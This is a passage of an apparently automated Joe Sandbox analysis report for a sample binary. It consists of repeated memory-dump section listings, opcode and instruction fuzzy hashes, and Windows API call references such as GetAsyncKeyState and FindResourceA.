                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: >JM3$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                      • API String ID: 0-2397989635
                                                                                      • Opcode ID: 4a0369773fc0df6b514c53e7cb8b19e8d9e943ede7e461c89c1b65a02b10e4ce
                                                                                      • Instruction ID: 459648606d1b8776e8cc07c0b8629968963722daa221ff6c72aa25d02ae3f364
                                                                                      • Opcode Fuzzy Hash: 4a0369773fc0df6b514c53e7cb8b19e8d9e943ede7e461c89c1b65a02b10e4ce
                                                                                      • Instruction Fuzzy Hash: 2D614AA2D086649AF7218624DC447DB7A39EF51310F0400FED94CA7282DABE4FC9CB26
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: E$P$]$c$e$i$o$r$s$s$t$x
                                                                                      • API String ID: 0-840109329
                                                                                      • Opcode ID: e25773cd087de1dca86a5199186f99847bf2504fa497c507327a110379c01f40
                                                                                      • Instruction ID: 34fcb33334c59c9c30324651699c0822ecdfa6f1cb4ab137aa214cedef19846f
                                                                                      • Opcode Fuzzy Hash: e25773cd087de1dca86a5199186f99847bf2504fa497c507327a110379c01f40
                                                                                      • Instruction Fuzzy Hash: 16E169B2D082549FF7208628DC84BEBBB74EB91314F1441FAD84D56282D27D5FCACB62
                                                                                      APIs
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 0041183F
                                                                                      • CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041193D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncCallProcStateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 4126171785-0
                                                                                      • Opcode ID: 9999cd5daf67d3ca102819d3f0d68b1495df25c23dddc2979e42dd8acd527b9b
                                                                                      • Instruction ID: 7432ea2984d698679705993177b1f05e6fa5cecc4cddcfedc69d7bc6332db596
                                                                                      • Opcode Fuzzy Hash: 9999cd5daf67d3ca102819d3f0d68b1495df25c23dddc2979e42dd8acd527b9b
                                                                                      • Instruction Fuzzy Hash: 24318674604308EBDB54EFA4DC85FD977B4AB49700F10856AF706AB2A1C7749980CF68
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 00412653
                                                                                        • Part of subcall function 004A723D: __EH_prolog.LIBCMT ref: 004A7242
                                                                                        • Part of subcall function 004A723D: BeginPaint.USER32(?,?,?,?,0049CA42), ref: 004A7270
                                                                                      • SendMessageA.USER32(?,00000027,?,00000000), ref: 004126A1
                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 004126A9
                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 004126B4
                                                                                      • GetClientRect.USER32(?,?), ref: 004126CB
                                                                                      • DrawIcon.USER32(?,?,?,?), ref: 0041271E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$BeginClientDrawH_prologIconIconicMessagePaintRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 3338691375-0
                                                                                      • Opcode ID: e7f495057b1e3752161f30e6cc312347f05df194d5b936f730ef53ac7e1c3505
                                                                                      • Instruction ID: ee067db6947b0a52d960848ca6558a6fe274652eab13745972a10f196bc1ccac
                                                                                      • Opcode Fuzzy Hash: e7f495057b1e3752161f30e6cc312347f05df194d5b936f730ef53ac7e1c3505
                                                                                      • Instruction Fuzzy Hash: A5314D75A00209DFDB24DFA9DD85FDEBBB4BF48300F1082A9E509E7291DA30A940CF64
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(?,?,000000F0), ref: 004A1460
                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,0049CE6C,?,?,004125A1), ref: 004A146C
                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,0049CE6C,?,?,004125A1), ref: 004A1479
                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,0049CE6C,?,?,004125A1), ref: 004A1494
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                      • String ID:
                                                                                      • API String ID: 1078018258-0
                                                                                      • Opcode ID: 04bc508bbb0a6c0b8ffd16d7c73bb5e27932c22b153834cc8b9c057cff73663f
                                                                                      • Instruction ID: 425bace81c03666c09764c4e48e81e934ac158f6e46df67dc4b163a6d636c2fe
                                                                                      • Opcode Fuzzy Hash: 04bc508bbb0a6c0b8ffd16d7c73bb5e27932c22b153834cc8b9c057cff73663f
                                                                                      • Instruction Fuzzy Hash: A5F096762013116F97115B6A5C44D7BB6ACAFEB762F05413AFD09D2232CE248C0186BD
                                                                                      APIs
                                                                                      • GetThreadLocale.KERNEL32 ref: 00412447
                                                                                      • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007), ref: 0041245F
                                                                                      • GetACP.KERNEL32 ref: 004124A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Locale$InfoThread
                                                                                      • String ID:
                                                                                      • API String ID: 4232894706-0
                                                                                      • Opcode ID: 0064d13c4b2b3c42fde313cb538e14f15c3b1500968b0addd3713f8f75ccfce9
                                                                                      • Instruction ID: 81fe3095a1218f4cfb16abfa55536d42795fa9ce53d5e3967fa74d32aaa17f37
                                                                                      • Opcode Fuzzy Hash: 0064d13c4b2b3c42fde313cb538e14f15c3b1500968b0addd3713f8f75ccfce9
                                                                                      • Instruction Fuzzy Hash: EE110670E01249EFCF08DFA4C695AEEBBB5EF48305F2040AED905A7351D6749A40DB98
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Q
                                                                                      • API String ID: 0-854704334
                                                                                      • Opcode ID: d0bba4e65d868e8e7092d82300e7083700da3b549659ee72f28b0312a91d4b18
                                                                                      • Instruction ID: ccb6cb3c9a9ded772c8a3bae748271eb210138825932e58b2dca2e9c4286c6c4
                                                                                      • Opcode Fuzzy Hash: d0bba4e65d868e8e7092d82300e7083700da3b549659ee72f28b0312a91d4b18
                                                                                      • Instruction Fuzzy Hash: 1AA136B2D001249BEB208B24DC84BEBBB74EF41315F1441BFDC4D66642EA395EC6CBA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?
                                                                                      • API String ID: 0-1684325040
                                                                                      • Opcode ID: e03dfde99ac5787d196205829d6db6660d5fde166142fd6bb54c4db9c54d014e
                                                                                      • Instruction ID: fcfb0b42ed7f97da0a0d3e0b77974c2692e7233359a435c61408a079bc68aa60
                                                                                      • Opcode Fuzzy Hash: e03dfde99ac5787d196205829d6db6660d5fde166142fd6bb54c4db9c54d014e
                                                                                      • Instruction Fuzzy Hash: 6FB18475A002069FD714CF58C5D06AAFBA2FF99324F24C29EC8094F746D736E946CB91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
